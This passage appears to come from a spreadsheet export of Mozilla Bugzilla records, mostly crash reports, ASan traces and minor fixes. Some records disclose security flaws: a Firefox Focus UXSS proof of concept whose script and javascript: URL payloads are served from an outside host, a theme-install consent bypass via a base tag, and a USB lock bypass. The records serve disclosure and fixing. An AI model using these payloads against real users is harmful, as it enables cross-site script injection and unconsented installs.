Long story short, when the server send a DATA frame defined padding length=6, but only had 5 bytes in payload(including padding length byte). Firefox would crash.
Steps to reproduce:
1. mkdir src
2. export GOPATH=path to the folder created at step.1
3. mkdir -p src/github.com/summerwind
4. cd src/github.com/summerwind
5. git clone https://github.com/chhsiao90/h2spec.git
6. git checkout h2specd
7. go run cmd/h2spec/h2specd.go -t -p 8080 -c server.crt -k server.key -v
8. open firefox to http://localhost:8080
9. find the third link under 6.1. DATA marked with desc: Sends a DATA frame with invalid pad length
Actual results:
Firefox crashed
Expected results:
Marked the http2 connection as connection error, send GOAWAY frame and close the connection</t>
        </is>
      </c>
      <c r="X5036" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5037">
      <c r="A5037" t="n">
        <v>1304948</v>
      </c>
      <c r="B5037" t="inlineStr">
        <is>
          <t>2016-09-22 20:45:51 -0700</t>
        </is>
      </c>
      <c r="C5037" t="inlineStr">
        <is>
          <t>SEGV near null in [@mozilla::dom::TextTrack::GetTrackElement]</t>
        </is>
      </c>
      <c r="D5037" t="inlineStr">
        <is>
          <t>2016-12-22 06:49:12 -0800</t>
        </is>
      </c>
      <c r="E5037" t="n">
        <v>1</v>
      </c>
      <c r="F5037" t="n">
        <v>1</v>
      </c>
      <c r="G5037" t="n">
        <v>3</v>
      </c>
      <c r="H5037" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5037" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5037" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5037" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5037" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5037" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5037" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5037" t="inlineStr"/>
      <c r="Q5037" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5037" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5037" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T5037" t="n">
        <v>1</v>
      </c>
      <c r="U5037" t="n">
        <v>0</v>
      </c>
      <c r="V5037" t="n">
        <v>21</v>
      </c>
      <c r="W5037" t="inlineStr">
        <is>
          <t>Created attachment 8794047
testcase
The attached testcase crashes in mozilla-central revision 058cf01f6cf2.
==31628==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000a8 (pc 0x7fc63941046b bp 0x7ffdaa3d17b0 sp 0x7ffdaa3d17b0 T0)
    #0 0x7fc63941046a in get src/obj-firefox/dist/include/mozilla/RefPtr.h:271:27
    #1 0x7fc63941046a in operator mozilla::dom::HTMLTrackElement * src/obj-firefox/dist/include/mozilla/RefPtr.h:287
    #2 0x7fc63941046a in mozilla::dom::TextTrack::GetTrackElement() src/dom/media/TextTrack.cpp:275
    #3 0x7fc6390accc9 in TrackChildPosition src/dom/html/TextTrackManager.cpp:493:38
    #4 0x7fc6390accc9 in mozilla::dom::CompareSimpleTextTrackEvents::LessThan(mozilla::dom::SimpleTextTrackEvent*, mozilla::dom::SimpleTextTrackEvent*) const src/dom/html/TextTrackManager.cpp:519
    #5 0x7fc63908ac5a in operator()&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt; &gt; src/obj-firefox/dist/include/nsTArray.h:813:9
    #6 0x7fc63908ac5a in BinarySearchIf&lt;nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;, nsTArrayInfallibleAllocator&gt;, detail::ItemComparatorFirstElementGT&lt;mozilla::dom::SimpleTextTrackEvent *&amp;, mozilla::dom::CompareSimpleTextTrackEvents&gt; &gt; src/obj-firefox/dist/include/mozilla/BinarySearch.h:80
    #7 0x7fc63908ac5a in IndexOfFirstElementGt&lt;mozilla::dom::SimpleTextTrackEvent *&amp;, mozilla::dom::CompareSimpleTextTrackEvents&gt; src/obj-firefox/dist/include/nsTArray.h:1462
    #8 0x7fc63908ac5a in RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;* nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;, nsTArrayInfallibleAllocator&gt;::InsertElementSorted&lt;mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents, nsTArrayInfallibleAllocator&gt;(mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents const&amp;) src/obj-firefox/dist/include/nsTArray.h:1481
    #9 0x7fc639089058 in mozilla::dom::TextTrackManager::TimeMarchesOn() src/dom/html/TextTrackManager.cpp:747:7</t>
        </is>
      </c>
      <c r="X5037" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5038">
      <c r="A5038" t="n">
        <v>1111725</v>
      </c>
      <c r="B5038" t="inlineStr">
        <is>
          <t>2014-12-15 10:59:43 -0800</t>
        </is>
      </c>
      <c r="C5038" t="inlineStr">
        <is>
          <t>UMS (USB) mounting after reboot even without unlocking</t>
        </is>
      </c>
      <c r="D5038" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:55 -0700</t>
        </is>
      </c>
      <c r="E5038" t="n">
        <v>1</v>
      </c>
      <c r="F5038" t="n">
        <v>1</v>
      </c>
      <c r="G5038" t="n">
        <v>6</v>
      </c>
      <c r="H5038" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5038" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5038" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K5038" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5038" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5038" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5038" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5038" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5038" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5038" t="inlineStr">
        <is>
          <t>2.2 S4 (23jan)</t>
        </is>
      </c>
      <c r="T5038" t="n">
        <v>1</v>
      </c>
      <c r="U5038" t="n">
        <v>0</v>
      </c>
      <c r="V5038" t="n">
        <v>31</v>
      </c>
      <c r="W5038" t="inlineStr">
        <is>
          <t>For security purpose, you are supposed to need unlocking your phone to have access to storage content when USB share is enabled.
STR : Enable USB share and reboot the phone. Plug it to the computer before or after reboot, it does not matter. After reboot is complete do NOT unlock the phone.
What will happen : You will see that shared Volumes will mount on your computer.
What should have happened : You are not supposed to get access to the USB shared volumes if the phone have not been unlocked (which is like an authentication to get this access)
Considering anyone can reboot the phone, it gives access to phones content for everyone.
Additional informations: Just after reboot, if the screen switch off (manually or by idle time), the USB mount is stopped, but after some switch between on and off state, it finally stay mounted even if the screen stay at off state.
However, when the screen is shut down, it will switch on itself again until USB mount keep its state even with switched off screen.
Main tested phone and build:
Build ID               20141214040212
Build Type             user
Gaia Revision          e2a3e606675c346b6e6f35351a458040be599b09
Gaia Date              2014-12-12 21:39:46
Gecko Revision         https://hg.mozilla.org/mozilla-central/rev/f14dcd1c8c0b
Gecko Version          37.0a1
Device ID              flame
Device Name            msm8610
Firmware(Release)      4.4.2
Firmware(Incremental)  39
Firmware Date          Thu Oct 16 18:19:14 CST 2014
Bootloader             L1TC00011880
Reproduced on a 2.0 build, not reproduced on 1.3.</t>
        </is>
      </c>
      <c r="X5038" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5039">
      <c r="A5039" t="n">
        <v>1863831</v>
      </c>
      <c r="B5039" t="inlineStr">
        <is>
          <t>2023-11-08 14:34:32 -0800</t>
        </is>
      </c>
      <c r="C5039" t="inlineStr">
        <is>
          <t>Full UXSS via opening Firefox Focus externally after silent background navigation</t>
        </is>
      </c>
      <c r="D5039" t="inlineStr">
        <is>
          <t>2024-11-13 16:32:16 -0800</t>
        </is>
      </c>
      <c r="E5039" t="n">
        <v>1</v>
      </c>
      <c r="F5039" t="n">
        <v>1</v>
      </c>
      <c r="G5039" t="n">
        <v>2</v>
      </c>
      <c r="H5039" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5039" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J5039" t="inlineStr">
        <is>
          <t>Security: iOS</t>
        </is>
      </c>
      <c r="K5039" t="inlineStr">
        <is>
          <t>Firefox 122</t>
        </is>
      </c>
      <c r="L5039" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5039" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5039" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5039" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5039" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5039" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5039" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T5039" t="n">
        <v>1</v>
      </c>
      <c r="U5039" t="n">
        <v>0</v>
      </c>
      <c r="V5039" t="n">
        <v>27</v>
      </c>
      <c r="W5039" t="inlineStr">
        <is>
          <t>We are able to achieve Full UXSS by calling iOS Firefox Focus externally after silent background navigation.
PoC:
https://pwning.click/googleloc.php (Open in Firefox Focus and leave the browser, last thing user has seen is only 
https://pwning.click/googleloc.php)
&lt;script&gt;setTimeout(function() {location="https://google.com"}, 3000);&lt;/script&gt;
https://pwning.click/focuslink.php (Open with other browsers/apps like iOS Chrome)
&lt;a href="firefox-focus://open-url?url=javascript:document.write(document.domain)"&gt;Open with Firefox Focus&lt;/a&gt;</t>
        </is>
      </c>
      <c r="X5039" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5040">
      <c r="A5040" t="n">
        <v>1552915</v>
      </c>
      <c r="B5040" t="inlineStr">
        <is>
          <t>2019-05-20 10:53:49 -0700</t>
        </is>
      </c>
      <c r="C5040" t="inlineStr">
        <is>
          <t>remove UPLOAD_INBOX_DIRECTORY</t>
        </is>
      </c>
      <c r="D5040" t="inlineStr">
        <is>
          <t>2023-05-09 12:46:08 -0700</t>
        </is>
      </c>
      <c r="E5040" t="n">
        <v>1</v>
      </c>
      <c r="F5040" t="n">
        <v>1</v>
      </c>
      <c r="G5040" t="n">
        <v>4</v>
      </c>
      <c r="H5040" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5040" t="inlineStr">
        <is>
          <t>Tecken</t>
        </is>
      </c>
      <c r="J5040" t="inlineStr">
        <is>
          <t>Upload</t>
        </is>
      </c>
      <c r="K5040" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5040" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5040" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5040" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5040" t="inlineStr"/>
      <c r="Q5040" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5040" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5040" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5040" t="n">
        <v>1</v>
      </c>
      <c r="U5040" t="n">
        <v>0</v>
      </c>
      <c r="V5040" t="n">
        <v>3</v>
      </c>
      <c r="W5040" t="inlineStr">
        <is>
          <t>From https://github.com/mozilla-services/tecken/issues/1727
&gt; Aka. DJANGO_UPLOAD_INBOX_DIRECTORY.
&gt; In an early version of Tecken, the idea was to accept the uploaded .zip file ASAP and then say "200 OK We're working on it. Bye!".
&gt; Then a Celery task would look into this inbox and start dealing with it.
&gt; 
&gt; This was rewritten to not use Celery at all. The reason, I think, is that the Celery workers might be in a different container/web head so the file system is different.
&gt; 
&gt; All mentions of it in code and documentation can be deleted. E.g. this: https://github.com/mozilla-services/tecken/blob/42a59ba8282210cfc1d3913fd391b3c67768081c/tecken/settings.py#L487-L492</t>
        </is>
      </c>
      <c r="X5040" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5041">
      <c r="A5041" t="n">
        <v>1449548</v>
      </c>
      <c r="B5041" t="inlineStr">
        <is>
          <t>2018-03-28 05:21:26 -0700</t>
        </is>
      </c>
      <c r="C5041" t="inlineStr">
        <is>
          <t>Lightweight themes can be installed automatically, without user's consent</t>
        </is>
      </c>
      <c r="D5041" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:23 -0700</t>
        </is>
      </c>
      <c r="E5041" t="n">
        <v>1</v>
      </c>
      <c r="F5041" t="n">
        <v>1</v>
      </c>
      <c r="G5041" t="n">
        <v>3</v>
      </c>
      <c r="H5041" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5041" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5041" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K5041" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5041" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5041" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q5041" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5041" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5041" t="n">
        <v>1</v>
      </c>
      <c r="U5041" t="n">
        <v>0</v>
      </c>
      <c r="V5041" t="n">
        <v>22</v>
      </c>
      <c r="W5041" t="inlineStr">
        <is>
          <t>Created attachment 8963092
Proof of concept page
The security checks determining which websites are allowed to install lightweight themes and particularly which are allowed to install them without user's consent are based on the baseURI property of the theme element. Unlike the document URI, this property can be easily manipulated - e.g. by using a &lt;base href="..."&gt; tag. This is what the attached proof of concept page does - opening it will immediately install a theme named "Hacked you" because the security checks consider that page to be discovery.addons.mozilla.org. This is also problematic in light of bug 527463: a theme might not even change the appearance of Firefox but invisibly track the user via updateURL instead.</t>
        </is>
      </c>
      <c r="X5041" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5042">
      <c r="A5042" t="n">
        <v>1300903</v>
      </c>
      <c r="B5042" t="inlineStr">
        <is>
          <t>2016-09-06 15:14:31 -0700</t>
        </is>
      </c>
      <c r="C5042" t="inlineStr">
        <is>
          <t>TopSite Cell should not use black as a background color. Use gray instead.</t>
        </is>
      </c>
      <c r="D5042" t="inlineStr">
        <is>
          <t>2016-10-20 10:39:46 -0700</t>
        </is>
      </c>
      <c r="E5042" t="n">
        <v>1</v>
      </c>
      <c r="F5042" t="n">
        <v>1</v>
      </c>
      <c r="G5042" t="n">
        <v>2</v>
      </c>
      <c r="H5042" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5042" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5042" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K5042" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5042" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5042" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5042" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5042" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q5042" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5042" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5042" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5042" t="n">
        <v>1</v>
      </c>
      <c r="U5042" t="n">
        <v>0</v>
      </c>
      <c r="V5042" t="n">
        <v>3</v>
      </c>
      <c r="W5042" t="inlineStr">
        <is>
          <t>I'm not sure what bbell thinks about it. He hasn't had a chance to look at it yet. But gray looks much better as a default color than black.</t>
        </is>
      </c>
      <c r="X5042" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5043">
      <c r="A5043" t="n">
        <v>1223810</v>
      </c>
      <c r="B5043" t="inlineStr">
        <is>
          <t>2015-11-11 07:15:58 -0800</t>
        </is>
      </c>
      <c r="C5043" t="inlineStr">
        <is>
          <t>Crash when zooming out on a three.js demo</t>
        </is>
      </c>
      <c r="D5043" t="inlineStr">
        <is>
          <t>2017-04-14 01:51:02 -0700</t>
        </is>
      </c>
      <c r="E5043" t="n">
        <v>1</v>
      </c>
      <c r="F5043" t="n">
        <v>1</v>
      </c>
      <c r="G5043" t="n">
        <v>3</v>
      </c>
      <c r="H5043" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5043" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5043" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5043" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L5043" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5043" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5043" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5043" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q5043" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5043" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5043" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5043" t="n">
        <v>1</v>
      </c>
      <c r="U5043" t="n">
        <v>0</v>
      </c>
      <c r="V5043" t="n">
        <v>33</v>
      </c>
      <c r="W5043" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0
Build ID: 20151103004217
Steps to reproduce:
1. Visit this three.js demo: http://mrdoob.neocities.org/001
2. Try zooming out 3 or 4 times
Actual results:
All tabs are 'crashed'.
Browser console shows:
LoginManagerContent:Couldn't parse origin for about:blank [LoginManagerContent.jsm:1178]
I'm not sure if that's before or after the crash, though.
Expected results:
Tabs shouldn't crash, it should just zoom out.</t>
        </is>
      </c>
      <c r="X5043" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5044">
      <c r="A5044" t="n">
        <v>1144094</v>
      </c>
      <c r="B5044" t="inlineStr">
        <is>
          <t>2015-03-17 05:57:53 -0700</t>
        </is>
      </c>
      <c r="C5044" t="inlineStr">
        <is>
          <t>[Super Search] Form validation should not fail on empty parameter</t>
        </is>
      </c>
      <c r="D5044" t="inlineStr">
        <is>
          <t>2015-03-18 09:26:50 -0700</t>
        </is>
      </c>
      <c r="E5044" t="n">
        <v>1</v>
      </c>
      <c r="F5044" t="n">
        <v>1</v>
      </c>
      <c r="G5044" t="n">
        <v>4</v>
      </c>
      <c r="H5044" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5044" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5044" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5044" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5044" t="inlineStr"/>
      <c r="Q5044" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5044" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5044" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5044" t="n">
        <v>1</v>
      </c>
      <c r="U5044" t="n">
        <v>0</v>
      </c>
      <c r="V5044" t="n">
        <v>3</v>
      </c>
      <c r="W5044" t="inlineStr">
        <is>
          <t>https://errormill.mozilla.org/webtools/socorro-prod/group/395379/
Types: 	AttributeError
Value: 	'NoneType' object has no attribute 'startswith'
Location: crashstats/supersearch/form_fields.py in split_on_operator , line 12</t>
        </is>
      </c>
      <c r="X5044" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5045">
      <c r="A5045" t="n">
        <v>795708</v>
      </c>
      <c r="B5045" t="inlineStr">
        <is>
          <t>2012-09-30 07:31:21 -0700</t>
        </is>
      </c>
      <c r="C5045" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsEditor::FindNextLeafNode</t>
        </is>
      </c>
      <c r="D5045" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:29 -0700</t>
        </is>
      </c>
      <c r="E5045" t="n">
        <v>1</v>
      </c>
      <c r="F5045" t="n">
        <v>1</v>
      </c>
      <c r="G5045" t="n">
        <v>3</v>
      </c>
      <c r="H5045" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5045" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5045" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5045" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5045" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5045" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5045" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5045" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5045" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5045" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5045" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5045" t="n">
        <v>1</v>
      </c>
      <c r="U5045" t="n">
        <v>0</v>
      </c>
      <c r="V5045" t="n">
        <v>28</v>
      </c>
      <c r="W5045" t="inlineStr">
        <is>
          <t>Created attachment 666323
Testcase
Reproduces on trunk
=================================================================
==10788== ERROR: AddressSanitizer heap-use-after-free on address 0x7f236f299db8 at pc 0x7f239927cf45 bp 0x7fff229632d0 sp 0x7fff229632c8
READ of size 8 at 0x7f236f299db8 thread T0
    #0 0x7f239927cf44 in nsINode::GetPreviousSibling() const src/../../dist/include/nsINode.h:1142
    #1 0x7f239e1112e2 in nsEditor::FindNextLeafNode(nsINode*, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3319
    #2 0x7f239e1108dc in nsEditor::FindNode(nsINode*, bool, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3401
    #3 0x7f239e110cc1 in nsEditor::FindNode(nsINode*, bool, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3411
    #4 0x7f239e10ca79 in nsEditor::GetPriorNode(nsINode*, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3301
    #5 0x7f239e10c106 in nsEditor::GetPriorNode(nsINode*, int, bool, bool) src/editor/libeditor/base/nsEditor.cpp:3190
    #6 0x7f239e649789 in nsHTMLEditor::GetPriorHTMLNode(nsINode*, int, bool) src/editor/libeditor/html/nsHTMLEditor.cpp:4104
    #7 0x7f239e7c3182 in nsHTMLEditRules::GetPromotedPoint(nsHTMLEditRules::RulesEndpoint, nsIDOMNode*, int, EditAction, nsCOMPtr&lt;nsIDOMNode&gt;*, int*) src/editor/libeditor/html/nsHTMLEditRules.cpp:5277
    #8 0x7f239e6d078e in nsHTMLEditRules::PromoteRange(nsIDOMRange*, EditAction) src/editor/libeditor/html/nsHTMLEditRules.cpp:5493
    #9 0x7f239e6cac26 in nsHTMLEditRules::AfterEditInner(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:430
    #10 0x7f239e6c8df6 in nsHTMLEditRules::AfterEdit(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:376
    #11 0x7f239e63798c in nsHTMLEditor::EndOperation() src/editor/libeditor/html/nsHTMLEditor.cpp:3513
    #12 0x7f239e06d372 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:94
    #13 0x7f239e04afc6 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:91
    #14 0x7f239e610e37 in nsHTMLEditor::Align(nsAString_internal const&amp;) src/editor/libeditor/html/nsHTMLEditor.cpp:2264
    #15 0x7f239e610fee in non-virtual thunk to nsHTMLEditor::Align(nsAString_internal const&amp;) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #16 0x7f23a1b430b0 in nsAlignCommand::SetState(nsIEditor*, nsString&amp;) src/editor/composer/src/nsComposerCommands.cpp:970
    #17 0x7f23a1b37113 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/editor/composer/src/nsComposerCommands.cpp:599
    #18 0x7f23a13912e2 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #19 0x7f23a136257d in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #20 0x7f23a1362796 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #21 0x7f23a137abd3 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) src/embedding/components/commandhandler/src/nsCommandManager.cpp:234
    #22 0x7f239c901752 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/content/html/document/src/nsHTMLDocument.cpp:3235
    #23 0x7f239c902c9d in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #24 0x7f23a4ebb543 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #25 0x7f23a00bcfa8 in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3110
    #26 0x7f23a011e1a5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1469
    #27 0x7f23ab687d9f in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:370
    #28 0x7f23ab629b79 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2460
    #29 0x7f23ab575aee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:324
    #30 0x7f23ab695566 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:509
    #31 0x7f23ab6972fb in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:546
    #32 0x7f23aadaa289 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5679
    #33 0x7f239d0c1dee in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1506
